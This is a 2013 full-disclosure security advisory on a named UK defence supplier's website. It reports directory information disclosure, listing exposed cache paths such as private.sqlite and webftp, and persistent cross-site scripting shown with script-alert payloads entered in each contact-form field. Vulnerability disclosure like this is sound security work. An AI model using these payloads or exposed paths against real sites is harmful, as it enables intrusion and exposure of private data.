OPTOMISE SYSTEM Ltd (UK Ministry of Defence and emergency services) Full Directory Information Disclosure/ Persistent XSS /
Time Line Vulnerability************************
04-11-2013 Security Advisory
07-11-2013 Ask About the Issues -> Not Reponse
14-11-2013 Ask About the Issues-> Not Response -> Not Fixed
18-11-2013 Full Disclosure
I. VULNERABILITY-------------------------
#Title: OPTOMISE SYSTEM Ltd Full (UK Ministry of Defence and emergency services.) Full Directory Information Disclosure/ Persistent XSS
#Vendor:https://www.optomise.com
#Author:Juan Carlos Garca (@secnight)
#Follow me http://asap-sec.comTwitter:@secnight
II. DESCRIPTION-------------------------
Optomise Systems Limited specialise in sourcing and promoting advanced technology, systems and products from UK and international companies, to the UK
Ministry of Defence and emergency services.
The experienced team at Optomise has a thorough understanding of the UK Ministry of Defence procurement system, and their operational and capability
requirements.
This knowledge, together with a remarkable international personal database of companies, links and a network of International Associates, ensures that the
team is well placed to advise, assist, develop and create the right environment for a successful business arrangement.
Whether facilitating the development of a joint venture, partnership, subsidiary or selling a single piece of hardware, Optomise approach every task with the
same commitment, to obtain and provide the best result.
Whatever the size or scale of your organisation, the services offered can be totally flexible and tailored to meet your specific needs.
Optomise has a working relationship within all levels of the Ministry of Defence and the team is equally at home talking to decision-makers or end users.
This combination has proven very successful and business has expanded through personal recommendation.
Optomise Systems is a member of the Advancing UK AeroSpace Defence and Security Industries (ADS) and a board member of the National Defense Industrial
Association (NDIA), SO/LIC Committee, in the USA.
III. PROOF OF CONCEPT-------------------------
Full Directory Information Disclosure**************************************
https://www.optomise.com/cachehttps://www.optomise.com/cache/-+index/https://www.optomise.com/cache/70+direct-sales/https://www.optomise.com/cache/70,171,172,179+index/https://www.optomise.com/cache/536_1015x672_0x.bzr.jpeghttps://www.optomise.com/cache/plus+webftp/https://www.optomise.com/cache/privado+index/https://www.optomise.com/cache/private.sqlite+index/https://www.optomise.com/cache/processSimple.do+index/https://www.optomise.com/cache/public+proxy.php/https://www.optomise.com/cache/CVS+Root/etcetcetc
Persistent Cross-Site Scripting******************************
Go to --------
https://www.optomise.com/contact-us/
Form
Name
<script>alert("asapsec")</script>
Company
<script>alert("asapsec")</script>
Email Address
<script>alert("asapsec")</script>
Phone Number
<script>alert("asapsec")</script>
Comments
<script>alert("asapsec")</script>
Response:---------
"Thank you"Thank you for your enquiry. Someone will get back to you shortly."
The impact of this vulnerability**********************************
(...)
How to fix this vulnerability******************************
Write Secure Code
IV. BUSINESS IMPACT-------------------------This type of security Flaws are extremely dangerous because it can be a serious impact on customers and states.. (... military...).
Disclosure about the military components and other things
V SOLUTION------------------------
Write Secure Code
VI. CREDITS-------------------------
This vulnerability has been discoveredby Juan Carlos Garca(@secnight)
VII. LEGAL NOTICES-------------------------
The Author accepts no responsibility for any damage